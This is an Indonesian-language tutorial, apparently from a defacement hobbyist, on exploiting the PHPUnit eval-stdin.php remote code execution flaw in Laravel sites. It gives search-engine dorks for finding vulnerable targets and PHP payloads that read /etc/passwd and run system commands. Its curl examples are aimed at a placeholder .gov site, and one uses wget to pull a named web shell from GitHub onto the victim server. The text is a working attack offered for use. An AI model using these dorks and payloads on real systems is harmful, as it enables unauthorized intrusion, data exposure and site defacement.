Cara Deface Laravel PHPUNIT RCE

 Assalamualaikum Ok Balik Lagi Bersama Gua di Sini KAKEGURAI Nah di Sini Gua Akan Sharing Cara deface Laravel phpunit rce with  curl 

Ok Langsung Aja......

PHPUNIT RCE menggunakan Curl...

inurl:vendor/phpunit/phpunit/src/

- inurl:/src/Util/PHP/ intitle:index of

- inurl:/Util/PHP/ "eval-stdin.php"

* kembangin lagi biar dapet target lebih fresh

Xploit : vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php

Kalo Blank Berarti Vuln 

Kalian Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan. List payload yang bisa kalian gunakan

<?php system('tail /etc/passwd'); ?>

<?php echo php_uname(); ?>

<?php show_source('/etc/passwd'); ?>

nah Contoh Comand Nya

"<?php system('uname -a'); ?>" https://targetkalian.gov/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Nah Jika Seperti Itu Berarti Vuln

Kalo mau upload shell cukup ganti payload nya saja

"<?php system('wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php'); ?>" https://targetkalian.gov/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Nah Ok Mungkin Segitu Aja Wassalamu'alaikum warahmatullahi wabarakatu Sampai Jumpa Lagi :)